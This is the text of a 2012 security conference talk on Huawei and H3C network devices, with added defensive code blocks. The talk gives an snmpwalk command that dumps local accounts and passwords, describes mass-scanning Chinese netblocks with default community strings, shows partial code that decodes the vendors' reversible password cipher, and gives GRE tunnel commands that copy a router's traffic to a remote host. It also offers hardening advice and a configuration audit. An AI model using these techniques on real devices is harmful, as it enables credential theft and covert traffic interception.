3. Disclaimer
Any content or opinion stated herein is that of myself and not of my employer. The information is being provided "as-is" and as a convenience, for informational purposes only. Any resemblance to real persons, living or dead, is purely coincidental. No warranty is expressed or implied. Not responsible for direct, indirect, incidental or consequential damages resulting from any defect, error or failure to perform. For recreational use only. May be too intense for some viewers.
BayThreat 2012 -- @grutz
A CouNtry’s Honorable n3twork deviCes
3
4. POLITICS!
This presentation does not care about the politics between China, the US and any companies.
Data is presented to show the pervasive risk these new vulnerabilities create.
China was only used because they have the largest install base of Huawei and H3C equipment available via the Internet!
5. About @grutz….
Penetration tester
In the business of breaking into businesses
6. The Huawei/H3C/HP Timeline
Timeline diagram, events and dates as labelled:
2006: Huawei-3Com Partnership
May 7, 2007: H3C is born!
Sep 28, 2007: Bain Capital / Huawei / 3Com deal
2008: US Gov't Smackdown
April 12, 2010: HP Acquires H3C
Oct 8, 2012: US Gov't Smackdown, Huawei/ZTE
7. Huawei != H3C
...except when they are (software)
Since the creation of H3C by Huawei-3Com the two companies diverged their product lines. Yet they still shared a very similar code origin (and bugs!)
Vulnerabilities described here and in FX's talk can generally affect Huawei devices in the Huawei-3Com years (2006-2010) and all H3C devices
9. Huawei's July 31, 2012 Response to c|net
http://news.cnet.com/8301-1009_3-57482813-83/expert-huawei-routers-are-riddled-with-vulnerabilities/
10. LET'S TALK BIG BANG
11. Overflows are cool…
…but they're finicky little beasts
Huawei/H3C not as bad as Cisco IOS but, still..
How many times have you used an IOS buffer overflow? No, really… Be serious here!
Now how many times have you used SNMP to download device configs?
Which would you rely upon for network penetration?
12. h3c (old) vs hh3c (new)
For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible-style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10.
For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB style.
By default, devices use H3C new-style MIB files;
http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228
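As an added example, not code from the talk or from the h3c-pt-tools project, the snippet below translates an OID between the two subtrees the quoted H3C text describes and emits the exclusion line for each MIB style, since a view that blocks only one form of a variable still leaves the other form readable. The functions, the view name ViewDefault and the command form `snmp-agent mib-view excluded <view> <oid>` with a view name are assumptions; the deck shows the lines without a view name.

```python
# Added example (not from the talk or from h3c-pt-tools): map OIDs between the two
# H3C MIB styles the quoted text describes, so a check or a MIB-view exclusion
# written for one style can be applied to the other as well.
H3C_OLD_PREFIX = "1.3.6.1.4.1.2011.10"   # h3c*  nodes, compatible-style MIB files
H3C_NEW_PREFIX = "1.3.6.1.4.1.25506"     # hh3c* nodes, new-style MIB files (the default)


def _arcs(oid):
    """Split a dotted numeric OID into integer arcs, rejecting anything else."""
    parts = oid.strip().lstrip(".").split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a numeric OID: {oid!r}")
    return [int(p) for p in parts]


def oid_style(oid):
    """'h3c', 'hh3c', or 'other' depending on which enterprise subtree holds the OID."""
    arcs = _arcs(oid)
    for style, prefix in (("h3c", H3C_OLD_PREFIX), ("hh3c", H3C_NEW_PREFIX)):
        p = _arcs(prefix)
        if arcs[:len(p)] == p:
            return style
    return "other"


def sibling_oid(oid):
    """The same variable's OID in the other MIB style (h3c <-> hh3c)."""
    style = oid_style(oid)
    if style == "other":
        raise ValueError(f"{oid} is not under either H3C subtree")
    src, dst = ((H3C_OLD_PREFIX, H3C_NEW_PREFIX) if style == "h3c"
                else (H3C_NEW_PREFIX, H3C_OLD_PREFIX))
    suffix = _arcs(oid)[len(_arcs(src)):]
    return ".".join([dst] + [str(a) for a in suffix])


def both_styles(oid):
    """(h3c form, hh3c form) of an OID that lives under either subtree."""
    twin = sibling_oid(oid)
    return (oid, twin) if oid_style(oid) == "h3c" else (twin, oid)


def mib_view_exclusions(oid, view="ViewDefault"):
    """Exclusion lines for both styles. The view-name argument is an assumption
    about the Comware command form; the slide shows the lines without it."""
    return [f"snmp-agent mib-view excluded {view} {o}" for o in both_styles(oid)]


if __name__ == "__main__":
    # the user table (h)h3c-user from the talk, given in its new-style form
    for line in mib_view_exclusions("1.3.6.1.4.1.25506.2.12.1.1.1"):
        print(line)
```

Run with no arguments it prints the two exclusion lines for the user table; `sibling_oid` raises on anything outside the two subtrees rather than guessing, so an unrelated enterprise OID is never silently rewritten.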
14. hh3c-config-man caveats
Support is spotty between device types
Mostly routers and switches work
H3C ERxxxx Series: OpType = 1 (system2net)
Downloads are logged
Requires Read/Write community string
Buggy!
Manual "snmpset" worked some of the time
Metasploit module worked some of the time
20. What is MAX-ACCESS and read-create?
RFC-1902: SMI for SNMPv2
21. …so it's protected, right?
Sure it is! Unless you know the SNMP READ ONLY string…
This was probably a bug… or a misunderstanding…
22. Let's glob some users!
$ snmpwalk -c public -v 1 <host> 1.3.6.1.4.1.2011.10.2.12.1.1.1
Walks the locally defined list of users:
local user <username>
password <clear|cipher|sha256> <value>
level [0|1|2|3]
25. Strap In and Let's Scan China!
26. INCONCEIVABLE!
http://www.okean.com/chinacidr.txt
2,444 netblocks
290,118,656 hosts
Only care about SNMP
Onesixtyone to the rescue!
Originally by Solar Eclipse
Updated in 2011 by Paul Flo Williams: https://github.com/hisdeedsaredust/onesixtyone
27. L33t b@$h sk1ddy
For best results use a VPS/host from a country China trusts
29. China Network Device Counts (Oct 2012)
Bar chart, two series per vendor (SNMP R/O and SNMP R/W):
Huawei / H3C: 117,033 and 88,517
ZTE: 64,579 and 33,669
Cisco: 11,278 and 2,475
vxWorks: 8,121
Juniper: 273 and 99
Source: Personal scan of China Netblock ranges using SNMP strings "public", "private", "h3c", "china" and "telecom"
30. Compare H3C results from ShodanHQ
31. (h)h3c-user Results
Devices with locally defined accounts: 15,588
Devices with ciphered passwords: 5,132
Devices with cleartext passwords: 15,263
Total accounts/passwords: 33,938
Unique passwords: 3,898
Username == Password: 2,101
Unique version strings: 686
A majority of cleartext-only passwords were from one Telecom company.
32. What Type of Accounts are these?
Local users can be used for:
Remote management access (telnet, ssh, web)
VPN access
In most cases telnet, ssh and http were open on devices with locally defined accounts.
34. SO ABOUT THAT CIPHER…
35. Huawei/H3C Not Unique In This
Weak and reversible ciphers seem to be a standard for all Networking companies at one time:
Cisco Type 7 Vigenère cipher
Juniper $9$
Generally these are used because some protocols need to use cleartext passwords yet these should not be stored in the clear.
So….why not ROT13? Just as secure…….
37. Want more examples? jfgi!
38. This means something…
Ciphers are 24 or 88 chars in length
'!!' at the end of everything
Base64 rotational? Good idea, but no… didn't pan out.
Consistent last few bytes of data: Q=^Q`MAF4<1!!
Consistent first 10 bytes (2P;JH_C3'+) when the cleartext is => 8 characters
39. Probably using a block-based cipher
Identical plaintext blocks encrypt to identical cipher blocks:
40. Binary/ASCII Encoding
Let's assume DES-ECB:
Probably a static key
Input = cleartext + null padding
Output = binary data
Binary result converted to printable ASCII
ASCII NOT Base64 but similar (4 chars to 3 bytes)
A consistent cipher string length based on source length means we're probably correct.
41. Let's decode to binary!
def decode_cipher(cipher):
    # cipher: the printable cipher string; cipherlen: its length
    cipherlen = len(cipher)
    result = bytearray()
    chkval = ord('a')      # an 'a' in the string stands for '?'
    cipher_loc = 0
    # converter works in groups of 4 until
    # cipherlen is reached
    for cnt in range(0, cipherlen, 4):
        # group 1
        cv1 = ord(cipher[cipher_loc])
        if cv1 == chkval:
            cv1 = ord('?')
        cv2 = cv1 - 33
        cipher_loc += 1
        # group 2
        cv1 = ord(cipher[cipher_loc])
        if cv1 == chkval:
            cv1 = ord('?')
        cv1 = cv1 - 33
        cv2 = (cv2 << 6) | cv1
        cipher_loc += 1
        # group 3
        cv1 = ord(cipher[cipher_loc])
        if cv1 == chkval:
            cv1 = ord('?')
        cv1 = cv1 - 33
        cv2 = (cv2 << 6) | cv1
        cipher_loc += 1
        # group 4
        cv1 = ord(cipher[cipher_loc])
        if cv1 == chkval:
            cv1 = ord('?')
        cv1 = cv1 - 33
        cv2 = (cv2 << 6) | cv1
        cipher_loc += 1
        # output: 24 bits -> 3 bytes
        result.append((cv2 & 0xff0000) >> 16)
        result.append((cv2 & 0xff00) >> 8)
        result.append(cv2 & 0xff)
    return result
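Added example, not code from the talk or from h3c-pt-tools: the printable-to-binary layer the last three slides work out (4 characters per 3 bytes, six bits per character offset by 33, with 'a' standing in for '?' as the decoder on this slide does), written in both directions, plus the repeated-block check that tells an ECB-mode output apart from a chained one. The "ciphertext" it feeds in is a constructed byte string with a deliberately repeated block; no key and no DES implementation are involved, and the function names are this example's own.

```python
# Added example, not code from the talk or from h3c-pt-tools. It covers the
# printable <-> binary layer the slides work out (4 characters per 3 bytes, six
# bits per character offset by 33, 'a' standing in for '?') in both directions,
# and the repeated-block test that distinguishes ECB output from a chained mode.
BASE = 33              # '!' (33) encodes the 6-bit value 0, '`' (96) encodes 63
SUBSTITUTE = ord('a')  # written in place of '?' (33 + 30); the decoder maps it back


def encode_cipher_ascii(data):
    """bytes -> printable string; NUL-pads to a multiple of 3 bytes first."""
    padded = data + b"\x00" * (-len(data) % 3)
    out = []
    for i in range(0, len(padded), 3):
        group = int.from_bytes(padded[i:i + 3], "big")        # 24 bits
        for shift in (18, 12, 6, 0):
            code = ((group >> shift) & 0x3F) + BASE
            out.append(chr(SUBSTITUTE if code == ord('?') else code))
    return "".join(out)


def decode_cipher_ascii(cipher):
    """printable string -> bytes (inverse of encode_cipher_ascii; padding is kept)."""
    if len(cipher) % 4:
        raise ValueError("cipher string length must be a multiple of 4")
    result = bytearray()
    for i in range(0, len(cipher), 4):
        group = 0
        for ch in cipher[i:i + 4]:
            code = ord('?') if ord(ch) == SUBSTITUTE else ord(ch)
            if not BASE <= code < BASE + 64:
                raise ValueError(f"character {ch!r} is outside the encoding alphabet")
            group = (group << 6) | (code - BASE)
        result += group.to_bytes(3, "big")
    return bytes(result)


def repeated_blocks(data, block_size=8):
    """{block: [offsets]} for every block_size-byte block that occurs more than once.
    Under ECB, equal plaintext blocks give equal ciphertext blocks, so a hit here is
    the fingerprint the 'identical plaintext blocks' slide describes."""
    seen = {}
    for off in range(0, len(data) - len(data) % block_size, block_size):
        seen.setdefault(data[off:off + block_size], []).append(off)
    return {blk: offs for blk, offs in seen.items() if len(offs) > 1}


def ecb_fingerprint(cipher, block_size=8):
    """True when the decoded cipher string contains a repeated block."""
    return bool(repeated_blocks(decode_cipher_ascii(cipher), block_size))


if __name__ == "__main__":
    # Constructed stand-in for a block cipher output: two identical 8-byte blocks then
    # a different one. No key and no DES are involved; only the encoding is real here.
    fake_ct = b"\x10\x11\x12\x13\x14\x15\x16\x17" * 2 + bytes(range(8))
    printable = encode_cipher_ascii(fake_ct)
    print(len(printable), printable, ecb_fingerprint(printable))
    # 16 or 64 bytes of cipher output would give exactly the 24- and 88-character
    # strings the slides report, and the two NUL pad bytes always land as a trailing "!!".
    print(len(encode_cipher_ascii(bytes(16))), len(encode_cipher_ascii(bytes(64))),
          encode_cipher_ascii(b"ABCDEFGH" * 2)[-2:])
```

The encoder explains two of the observations on the "This means something" slide without any cipher at all: '!' is the character for the value zero, so the two NUL bytes that pad 16 or 64 bytes up to a multiple of three always print as a trailing "!!", and those two output sizes are exactly what produce strings of 24 and 88 characters.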
42. Huawei's Solution
Use AES-256 and updated software for SNMP
Yes.. AES-256.. A symmetric cipher.
http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
43. HP/H3C's Solution
Use SHA-256 on those systems that support it
Upgrade your code for the SNMP fix.
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685
44. So about this SHA-256…
Yeah, salted SHA-256. Not reversible but crackable!
h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5
pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878
45. NOW WHAT?
46. Things to watch out for
All commands are logged locally
> reset logbuffer
Keyboard keys are very annoying
Backspace is not backspace, unless it's ^H
47. See All Packets!!!
<rtr1> system-view
[rtr-1] interface tunnel 1/0/1
[rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0
[rtr-1-Tunnel1/0/1] tunnel-protocol gre
[rtr-1-Tunnel1/0/1] source 10.10.1.1
[rtr-1-Tunnel1/0/1] destination 192.168.1.1
[rtr-1-Tunnel1/0/1] quit
[rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1
linux# modprobe ip_gre
linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255
linux# ip link set gre0 up
linux# ip addr add 10.10.10.2/24 dev gre0
49. Be protected.. Be be protected!
Don't configure local accounts, use RADIUS or TACACS+
Don't configure SNMPv1
Don't use default SNMP strings
Disable the snmp view for (h)h3c-user:
snmp-agent mib-view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1
snmp-agent mib-view excluded 1.3.6.1.4.1.25506.2.12.1.1.1
Use SHA256 passwords if your image supports it
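Added example that is neither the talk's nor h3c-pt-tools code: a config audit that tallies local accounts the way the (h)h3c-user results slide does (cleartext versus cipher versus sha256, username equal to password) and checks the advice on this slide, and that lists GRE tunnel interfaces like the one on the "See All Packets" slide so each can be confirmed as expected. The sample configuration is constructed. The `local-user` block form, the `snmp-agent community read|write` and `snmp-agent sys-info version` lines, and the optional view name on `snmp-agent mib-view excluded` are assumptions about Comware syntax; the `local user` / `password <clear|cipher|sha256>` / `level` shape comes from the deck.

```python
import re

DEFAULT_COMMUNITIES = {"public", "private"}           # the default strings the talk warns about
USER_TABLE_OIDS = {"1.3.6.1.4.1.2011.10.2.12.1.1.1",  # h3c-user  (compatible style)
                   "1.3.6.1.4.1.25506.2.12.1.1.1"}    # hh3c-user (new style)


def parse_blocks(config):
    """Yield (header, [indented body lines]) for every unindented config line."""
    header, body = None, []
    for raw in config.splitlines() + ["#"]:           # sentinel flushes the last block
        if raw.startswith(" "):
            body.append(raw.strip())
            continue
        if header is not None:
            yield header, body
        header, body = raw.strip(), []


def parse_local_users(config):
    """Local accounts as dicts: name, scheme (clear|cipher|sha256), value, level."""
    users = []
    for header, body in parse_blocks(config):
        m = re.match(r"local[- ]user[ \t]+(\S+)", header)   # 'local-user' (assumed) or 'local user'
        if not m:
            continue
        user = {"name": m.group(1), "scheme": None, "value": None, "level": None}
        for line in body:
            pw = re.match(r"password[ \t]+(clear|cipher|sha256)[ \t]+(\S+)", line)
            if pw:
                user["scheme"], user["value"] = pw.group(1), pw.group(2)
            lvl = re.match(r"level[ \t]+(\d)", line)
            if lvl:
                user["level"] = int(lvl.group(1))
        users.append(user)
    return users


def audit_config(config):
    """Tally accounts the way the results slide does and check the hardening advice."""
    users = parse_local_users(config)
    by_scheme = {s: [u for u in users if u["scheme"] == s] for s in ("clear", "cipher", "sha256")}
    same = [u for u in by_scheme["clear"] if u["value"] == u["name"]]
    counts = {"local_accounts": len(users), "cleartext": len(by_scheme["clear"]),
              "ciphered": len(by_scheme["cipher"]), "sha256": len(by_scheme["sha256"]),
              "unique_passwords": len({u["value"] for u in users if u["value"]}),
              "username_is_password": len(same)}
    findings = []
    if users:
        findings.append(f"{len(users)} local account(s) configured; prefer RADIUS or TACACS+")
    findings += [f"cleartext password for local user {u['name']}" for u in by_scheme["clear"]]
    findings += [f"username equals password for local user {u['name']}" for u in same]
    findings += [f"reversible cipher password for local user {u['name']}; use sha256 if the image supports it"
                 for u in by_scheme["cipher"]]
    # SNMP version and community strings (Comware command forms assumed)
    for m in re.finditer(r"^snmp-agent sys-info version[ \t]+(.+?)[ \t]*$", config, re.M):
        if {"v1", "all"} & set(m.group(1).split()):
            findings.append(f"SNMPv1 enabled ({m.group(0).strip()})")
    for m in re.finditer(r"^snmp-agent community[ \t]+(read|write)[ \t]+(\S+)", config, re.M):
        if m.group(2).lower() in DEFAULT_COMMUNITIES:
            findings.append(f"default {m.group(1)} community '{m.group(2)}'")
    # the user table must be excluded in both OID styles; the view name is optional as on the slide
    excluded = set(re.findall(r"^snmp-agent mib-view excluded[ \t]+(?:\S+[ \t]+)?(\d[\d.]*)[ \t]*$",
                              config, re.M))
    findings += [f"user table {oid} not excluded from any MIB view" for oid in sorted(USER_TABLE_OIDS - excluded)]
    # GRE tunnels can carry the device's traffic elsewhere, so each one should be known and expected
    for header, body in parse_blocks(config):
        name = re.match(r"interface[ \t]+(tunnel\S*)", header, re.I)
        if name and any(l.startswith("tunnel-protocol gre") for l in body):
            dest = next((l.split()[1] for l in body if l.startswith("destination ")), "?")
            findings.append(f"GRE tunnel {name.group(1)} to {dest}: verify it is expected")
    return {"counts": counts, "findings": findings}


# Constructed sample configuration (not taken from any real device)
SAMPLE_CONFIG = """\
snmp-agent community read public
snmp-agent sys-info version v1 v2c
snmp-agent mib-view excluded ViewDefault 1.3.6.1.4.1.2011.10.2.12.1.1.1
#
local-user admin
 password clear admin
 level 3
#
local-user ops
 password cipher ABCDEFGHIJKLMNOPQRSTUV!!
#
local-user auditor
 password sha256 $saltsalt$0123456789abcdef0123456789abcdef
#
interface Tunnel1/0/1
 tunnel-protocol gre
 destination 192.168.1.1
#
"""

if __name__ == "__main__":
    report = audit_config(SAMPLE_CONFIG)
    print(report["counts"])
    for finding in report["findings"]:
        print("-", finding)
```

On the sample it reports three local accounts with one cleartext, one reversible cipher and one sha256 password, flags the admin account whose password equals its name, the SNMPv1 line, the default "public" read community, the hh3c-style user table that is still visible because only the h3c-style OID was excluded, and the GRE tunnel; a configuration with no local users, version v3 only and both OIDs excluded produces no findings.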
50. http://github.com/grutz/h3c-pt-tools/
http://grutztopia.jingojango.net/
Thanks to #metasploit, hdm, FX, eMaze (Ivan and Roberto), HP/H3C and Huawei IRTs, US-CERT and others whom I may have forgotten
QUESTIONS?